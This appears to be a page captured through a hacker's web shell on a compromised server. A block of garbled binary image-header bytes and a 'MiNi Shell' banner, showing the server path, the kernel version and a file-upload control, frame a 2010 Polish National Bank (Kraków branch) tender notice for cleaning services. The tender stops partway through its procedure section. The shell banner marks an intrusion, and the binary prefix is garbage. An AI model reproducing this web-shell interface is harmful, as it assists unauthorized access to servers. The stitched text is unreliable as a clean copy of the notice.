JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100526/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100526/145876-N-2010.html

<p class="kh_header"><b>Kraków: utrzymanie czystości i porządku w obiektach i na terenie nieruchomości gruntowej Oddziału Okręgowego Narodowego Banku Polskiego w Krakowie przy ul. Basztowej 20, ul. Zacisze 2, ul. Zacisze 4, Placu Matejki 1 i Placu Matejki 1a</b><br>
<b>Numer ogłoszenia: 145876 - 2010; data zamieszczenia: 26.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Narodowy Bank Polski Oddział Okręgowy w Krakowie , ul. Basztowa 20, 30-960 Kraków, woj. małopolskie, tel. 012 4223291.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nbp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> utrzymanie czystości i porządku w obiektach i na terenie nieruchomości gruntowej Oddziału Okręgowego Narodowego Banku Polskiego w Krakowie przy ul. Basztowej 20, ul. Zacisze 2, ul. Zacisze 4, Placu Matejki 1 i Placu Matejki 1a.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest utrzymanie czystości i porządku wewnątrz obiektów oraz na terenie nieruchomości gruntowej Oddziału Okręgowego NBP w Krakowie : 

a) wewnątrz obiektów, wraz ze znajdującym się w nich wyposażeniem, a w szczególności :

- w pokojach oraz pomieszczeniach biurowych, socjalnych, sanitarnych i pomocniczych w budynku głównym przy ul. Basztowej 20 oraz przy Pl. Matejki 1, Pl. Matejki 1a, ul. Zacisze 2 i ul. Zacisze 4 ( wraz z ciągami komunikacyjnymi ),
- w pokojach gościnnych Oddziału w budynkach przy ul. Zacisze 2 i Pl. Matejki 1 
( łączna ilość pokoi gościnnych - 8, w tym : 4 pokoje ze wspólnym węzłem sanitarnym,
- w obiekcie wielofunkcyjnym przy ul. Basztowej 20 ( w którym znajduje się m.in. posterunek wartowników, pomieszczenie z pojemnikami na odpady),
w tym :
- mycie oszkleń w obiektach przy ul. Basztowej 20, ul. Zacisze 2, ul. Zacisze 4, Pl. Matejki 1, i Pl. Matejki 1a,
- mycie drzwi i bram oszklonych oraz przeszklonych przegród w obiektach Oddziału,
- jednorazowa krystalizacja posadzki marmurowej,
- jednorazowe  odnowienie płytek ceramicznych poprzez wyczyszczenie i naniesienie powłoki nabłyszczającej ( akrylu )

b) na zewnątrz obiektów :
- na terenie nieruchomości gruntowej oraz na podwórku, na chodnikach, schodach i balkonach,
w tym :
- usuwanie oblodzeń, sopli, śniegu, lodu, itp. ( w okresie zimowym ) z chodników, podwórka, dachów, zadaszeń i balkonów obiektów Oddziału,
- pryzmowanie i wywożenie śniegu z podwórka Oddziału oraz pryzmowanie śniegu na chodnikach wokół nieruchomości.

2. Zakres prac porządkowych związanych z utrzymaniem porządku i czystości w obiektach oraz na terenie nieruchomości gruntowej z użyciem własnych, wymaganych przez zamawiającego urządzeń, narzędzi oraz niezbędnych środków do wykonania usługi, z dostawą i uzupełnianiem mydła w płynie w pojemnikach (bez dostawy i uzupełniania papieru toaletowego oraz ręczników papierowych).

Obiekty przy ul. Basztowej 20, ul. Zacisze 2 i Placu Matejki 1, Pl. Matejki 1a są 4 kondygnacyjne ( naziemne) , z poddaszem i podpiwniczeniem.
Obiekt przy ul. Zacisze 4 jest 2 kondygnacyjny.
Łączna powierzchnia do obsługi wynosi - 5.350 m2,
w tym :
- powierzchnia w obiektach - 3.970 m2,
- powierzchnia nieruchomości gruntowej - 1.380 m2,

Łączna powierzchnia oszkleń wynosi  - 2.340 m2
Powierzchnia ogółem wewnątrz obiektów - 3.970 m2,
w tym :
- powierzchnia pokoi biurowych - 902 m2,
- powierzchnia pokoi gościnnych - 307 m2,
- powierzchnia pomieszczeń sanitarnych - 97 m2,
- powierzchnia pomieszczeń socjalnych - 92 m2,
- powierzchnia ciągów komunikacyjnych  - 1.830m2
- powierzchnia pomieszczeń innych ( sala konferencyjna, operacyjna, sortownia, itp. )  - 625 m2
- powierzchnia innych pomieszczeń w piwnicy ( palarnia, pomieszczenie pomocnicze, itp. ) - 117 m2

Pokoje biurowe - wyposażenie standardowe : biurka, krzesła, szafy, stoliki, sprzęt biurowy i inny - telefony, niszczarki, klimatyzatory, faxy, zegary,  lampy, itp.

Pomieszczenia sanitarne
Ilość sanitariatów - 12 ( w tym : 24 miski  ustępowe, 24 umywalki, 4 pisuary )

Standardowe wyposażenie łazienek : umywalki porcelanowe ( wiszące i stojące ), miski ustępowe ( stojące i wiszące), podajniki do ręczników papierowych, podajniki do mydła w płynie, lustra, kosze na ręczniki papierowe, pojemniki na odpady sanitarne, itp.

- Pomieszczenia socjalne
Wyposażenie  : zlewozmywaki ze stali nierdzewnej, lodówki, kuchenki mikrofalowe, kuchenki elektryczne, kosze na śmieci, stoliki, krzesła, itp.

- Pokoje gościnne
Łączna ilość pokoi gościnnych - 8 , w tym : 4 pokoje z węzłami sanitarnymi i aneksami kuchennymi, 4 pokoje bez węzłów sanitarnych ( sanitariaty i aneks kuchenny w korytarzu ).

Wyposażenie standardowe : szafy, szafki, witryny, krzesła, stoły, ławy, kanapy, wersalki, zlewy, naczynia, sztućce, szkliwo, kuchenki elektryczne, lodówki, telewizowy, telefony, lampy stojące, lustra, obrazy, dywany, umywalki, kabiny natryskowe, muszle klozetowe, kosze na śmieci, itp.

- Rodzaje powierzchni poziomych :
- dywany i wykładziny dywanowe,
- wykładziny przemysłowe bezspoinowe, antypoślizgowe,
- płytki podłogowe - terrakota,
- kamień - marmur,
- drewniane ( parkiet, panele )
- kamień - lastryko
- kamień - beton, kostka brukowa.

Rodzaje powierzchni pionowych
- pokoje biurowe - ściany malowane farbą emulsyjną,
- pomieszczenia socjalne i ciągi komunikacyjne - ściany malowane farbą emulsyjną i olejną,
- przeszklone drzwi wejściowe i bramy oraz drzwi wewnętrzne, a także inne przeszklenia ( drewno, metal, szkło )
- powierzchnie kamienne pionowe wewnętrzne  (sala operacyjna)
- powierzchnie drewniane ( boazeria )
- ściany sanitariatów pokryte glazurą do wysokości 2 m lub panelami o wysokości 3,5 m.

- Usługa prac porządkowych realizowana w czterech przedziałach czasowych 

- w godz. od 16.30 do 22.00 - prace porządkowe wykonywane codziennie ( wewnątrz obiektów - od poniedziałku do piątku, na zewnątrz obiektów - od poniedziałku do piątku i również w soboty, niedziele i święta ),

- w godz. od 16.30 do 18.00 - prace wykonywane cyklicznie ( np. : raz w tygodniu, raz w miesiącu ) w uzgodnionym dniu od poniedziałku do piątku,

- w godz. od 8.00 do 15.00 codzienne prace w pokojach gościnnych, wykonywane od poniedziałku do piątku, a w razie konieczności w innych godzinach, również w soboty, niedziele i święta,

w godz. od 7.00 do 15.00 - prace porządkowe wykonywane od poniedziałku do piątku na zasadzie usługi serwisowej ( pracownik do dyspozycji w pełnej gotowości do wykonywania bieżących prac porządkowych stałych i doraźnych w zależności od potrzeb ),

- do godz. 7.00 winny być zakończone codzienne prace porządkowe na podwórku banku, schodach i balkonach oraz na chodnikach wokół nieruchomości (usunięcie zanieczyszczeń, zmycie powierzchni wodą, usunięcie śniegu i lodu, itp.)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Dla przedmiotu zamówienia analogicznego do określonego w pkt. II.1.3.) i w zakresie do 50% wartości zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-6, 90.91.13.00-9, 90.91.92.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od wykonawców wniesienia wadium w kwocie 5.600,00 PLN 
( słownie : pięć tysięcy sześćset złotych ).
Wadium wnosi się przed upływem terminu składania ofert przez wykonawców zaproszonych do ich złożenia.
Wadium może być wnoszone w jednej lub kilku następujących formach :
1) pieniądzu,
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym ,że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3) gwarancjach bankowych,
4) gwarancjach ubezpieczeniowych,
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz. U. z 2007 r. Nr 42, poz. 275 ).

wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy wskazany przez zamawiającego w SIWZ</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku dokonywana będzie w oparciu o złożone oświadczenie o spełnianiu warunków udziału w postępowaniu, o którym mowa w tytule pkt. III.4.1) według formuły /spełnia - nie spełnia/.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku III.3.2) Wiedza i doświadczenie, dokonywana będzie dwuetapowo.

W pierwszym etapie zamawiający dokona oceny spełnienia warunku i uzna warunek za spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich 3 lat przed dniem składania wniosku o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonywał lub wykonuje usługi utrzymania czystości i porządku, przy czym za takie usługi zamawiający uzna wykonanie lub wykonywanie co najmniej 2 zamówień 
( kontraktów) wykonanych lub wykonywanych w obiekcie o charakterze biurowym ( nie będą zaliczane hale produkcyjne, sportowe, magazynowe, składowe, centra handlowe, itp. ) nieprzerwanie przez okres nie krótszy niż 12 miesięcy o łącznej wartości nie mniejszej niż 240.000 zł brutto i łącznej powierzchni nie mniejszej niż 5.000 m2, w tym co najmniej jednej usługi w ramach jednego zamówienia 
(kontraktu) o wartości nie mniejszej niż 120.000 zł brutto i jednocześnie o powierzchni nie mniejszej niż 2.500 m2, wykonanej lub wykonywanej nieprzerwanie przez okres nie krótszy niż 12 miesięcy w ramach jednego zamówienia (kontraktu).

Na potwierdzenie warunku wykonawca przedłoży zamawiającemu wykaz usług, o którym mowa w pkt. III.4.1) tiret trzecie.

Wykaz należy sporządzić w układzie tabelarycznym.

W pojedynczym wierszu tabeli należy wpisać informacje na temat usług wykonanych lub wykonywanych w ramach jednego zamówienia (kontraktu), w kolumnach tabeli należy wyszczególnić następujące informacje :
a) nazwę i adres budynku (budynków), w których usługa była lub jest wykonywana,
b) nazwę i adres podmiotu na zlecenie którego usługa była lub jest wykonywana,
c) rodzaj wykonywanej usługi ( jednoczesne utrzymanie czystości i porządku wewnątrz i na zewnątrz budynków, w obiektach o charakterze biurowym), 
d) wielkość powierzchni ( wyrażona w m2) na której usługa była lub jest wykonywana,
e) data rozpoczęcia wykonywania usługi ( dzień, miesiąc, rok) i zakończenia wykonywania usługi ( dzień, miesziąc, rok) lub , gdy usługa jest wykonywana - określenie /nadal , do .......... ( dzień, miesiąc, rok)/.
f) wartość usługi wyrażoną jako kwota brutto w złotych polskich.

Kolumna /wielkość powierzchni na której usługa była lub jest wykonywana, wyrażona w m2/ oraz /wartość usługi wyrażona jako kwota brutto w złotych polskich/ winna być zsumowana dla wszystkich zamówień (kontraktów) z  poszczególnych wierszy. Do wykazu należy dołączyć dokumenty jednoznacznie potwierdzające, że każda z usług ujętych w wykazie w pojedynczych wierszach tabeli została wykonana należycie lub jest wykonywana należycie.

Ocena spełnienia tego warunku będzie dokonana wg formuły /spełnia  - nie spełnia/ i zostanie przeprowadzona na podstawie dostarczonego przez wykonawcę ww. wykazu usług oraz oświadczenia o spełnianiu warunków udziału w postępowaniu.

Drugi etap oceny dokonany będzie w przypadku, gdy liczba wykonawców spełniających warunki udziału w postępowaniu przekroczy liczbę 5 i polegać będzie na porównaniu łącznej  wielkości zsumowanych powierzchni na których usługi były lub są wykonywane przez poszczególnych wykonawców oraz liczby usług wykonanych lub wykonywanych ( w ramach jednego zamówienia (kontraktu) o wartości nie mniejszej niż 120.000 zł brutto i jednocześnie o powierzchni nie mniejszej niż 2.500 m2) przez poszczególnych wykonawców.

Na podstawie tej oceny zostaną wybrani wykonawcy, którzy zostaną zaproszeni do udziału w postępowaniu.

Szczegółowy opis sposobu wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu podany został w pkt. IV.1.2) niniejszego ogłoszenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje specjalistycznym sprzętem do wykonywania usługi utrzymania czystości i porządku wewnątrz i na zewnątrz obiektów, a w tym co najmniej :

5 odkurzaczami przemysłowymi do zbierania zanieczyszczeń suchych i płynów, z filtrami wodnymi pochłaniającymi kurz, roztocza, itp., cicho pracującymi,

2 urządzeniami przeznaczonymi do froterowania powierzchni pokrytych środkami nabłyszczającymi.

Na potwierdzenie warunku wykonawca przedłoży zamawiającemu wykaz sprzętu, o którym mowa w pkt. III.4.1) tiret czwarte.

Wykaz należy sporządzić w układzie tabelarycznym. W kolumnach tabeli należy wyszczególnić następujące informacje :
a/ nazwę sprzętu,
b/ liczbę,
c/ podstawę dysponowania tym sprzętem przez wykonawcę.

W pojedynczym wierszu tabeli należy wpisać informację na temat jednego rodzaju sprzętu.

Ocena spełnienia tego warunku będzie dokonana wg formuły /spełnia - nie spełnia/ i zostanie przeprowadzona na podstawie dostarczonego przez wykonawcę ww. wykazu sprzętu oraz oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca jest zobowiązany wykazać, że dysponuje osobami zdolnymi do uczestnictwa w wykonywaniu zamówienia.

Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże dysponowanie osobami, które będą łącznie uczestniczyły w wykonaniu zamóweinia , a minimalna liczba osób wykonujących usługę jednocześnie wynosić bądzie nie mniej niż 8 osób, w tym nie mniej niż 5 osób wykonujących prace wewnątrz obiektów i jednocześnie nie mniej niż 2 osoby wykonujące jednocześnie prace na zewnątrz obiektów. Liczba osób kontrolujących jakość wykonania zamówienia wynosić bądzie nie mniej niż 1 osobę, która obejmie pełną kontrolą i nadzorem wykonanie zamówienia we wszystkich przedziałach czasowych.

Na potwierdzenie warunku wykonawca przedłoży zamawiającemu wykaz wykonywanych czynności o którym mowa w pkt. III.4.1) tiret szóste.

Wykaz należy sporządzić w układzie tabelarycznym. W kolumnach tabeli należy wyszczególnić następujące informacje :
a) rodzaj wykonywanych czynności,
b) liczbę osób, które będą wykonywać poszczególne rodzaje czynności,
c) podstawę dysponowania tymi osobami przez wykonawcę.

Pojedyncze wiersze tabeli powinny zawierać rodzaj wykonywanych czynności ( w podziale na pracę wewnątrz obiektów, pracę na zewnątrz obiektów i nadzór), liczbę osób przyporządkowanych do poszczególnego rodzaju pracy i podstawę dysponowania tymi osobami.

Ocena spełnienia tego warunku będzie dokonana wg formuły /spełnia - nie spełnia/ i zostanie przeprowadzona na podstawie dostarczonego przez wykonawcę ww. wykazu wykonywanych czynności oraz oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną w wysokości, nie mniejszej niż 50.000 zł ( słownie złotych : pięćdziesiąt tysięcy).

Ocena spełnienia tego warunku będzie dokonana na podstawie oświadczenia wykonawcy oraz kopii opłaconej polisy ( w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia) oraz załączonych do niej dowodów opłacenia polisy.

Na potwierdzenie warunku wykonawca przedłoży zamawiającemu dokument, o którym mowa w pkt. III.4.1) tiret dziesiąte.

Ocena spełnienia tego warunku będzie dokonana wg formuły /spełnia - nie spełnia/ i zostanie przeprowadzona na podstawie dostarczonego dokumentu, o którym mowa w pkt. III.4.1) tiret dziesiąte oraz oświadczenia o spełnianiu warunków udziału w postępowaniu.

Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonywania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca jest zobowiązany udowodnić zamawiającemu, iż będzie dysponował zasobami opisanymi w III.3.2, III.3.3., III.3.4, niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</p>
<p>1. Zamawiający będzie dokonywał oceny spełnienia warunków udziału w postępowaniu na podstawie złożonych przez wykonawcę oświadczeń oraz dokumentów określonych w sekcji III. wg formuły /spełnia - nie spełnia/. Wszystkie oświadczenia i dokumenty muszą być podpisane czytelnie i własnoręcznie przez wykonawcę lub osobę/osoby upoważnione. Jeżeli uprawnienie nie wynika z dokumentu rejstrowego wykonawcy, należy dołączyć stosowne pełnomocnictwa w oryginale lub kserokopii notarialnie potwierdzonej za zgodność z oryginałem. W przypadku , gdy wykonawca załączy kserokopie dokumentów, muszą być one potwierdzone z użyciem sformułowania / za zgodność z oryginałem / oraz podpisane własnoręcznie przez wykonawcę lub osobę /osoby upoważnione. Nie dotyczy to oświadczeń (lub jednego oświadczneia obejmującego spełnienie wszystkich warunków udziału w postępowaniu), które mogą być złożone wyłącznie w oryginale.
Z treści załączonych dokumentów i oświadczeń musi jednoznacznie wynikać , że wykonawca spełnia wszystkie warunki udziału w postępowaniu. Nie spełnienie któregokolwiek warunku spowoduje wykluczenie wykonawcy z postępowania. 
